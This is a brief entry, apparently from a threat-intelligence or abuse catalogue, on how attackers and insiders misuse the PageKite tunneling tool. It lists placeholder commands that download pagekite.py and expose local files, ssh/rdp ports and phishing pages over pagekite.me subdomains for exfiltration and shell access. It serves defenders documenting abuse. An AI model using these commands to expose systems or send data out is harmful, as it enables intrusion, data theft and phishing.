PageKite is a fast, reliable localhost tunneling solution which is paid but allows a free version for 1 month. This can be abused by the threat actors as well as insiders to expose local apps, services over the internet as well as to download malicious binaries, host malware and to host phishing sites to target users.
PageKite allows to download a python program which can be called directly from the URL and can be executed on the local machine.
curl -O https://pagekite.net/pk/pagekite.py
Exposing local file system over the internet for data exfiltration.
pagekite.py <LOCAL PATH> <SUBDOMAIN>.pagekite.me
Exposing local services over the internet for external access.
pagekite.py <PORT> <SUBDOMAIN>.pagekite.me
Exposing local ssh/rdp over PageKite domains for shell-access.
pagekite.py <PORT> <SUBDOMAIN>.pagekite.me
Hosting phishing pages locally and exposing them via PageKite subdomains to target users.
pagekite.py <PORT> <SUBDOMAIN>.pagekite.me
Hosting malicious files/confidential files via a local path and exposing them over PageKite domains for download.
pagekite.py <LOCAL PATH> <SUBDOMAIN>.pagekite.me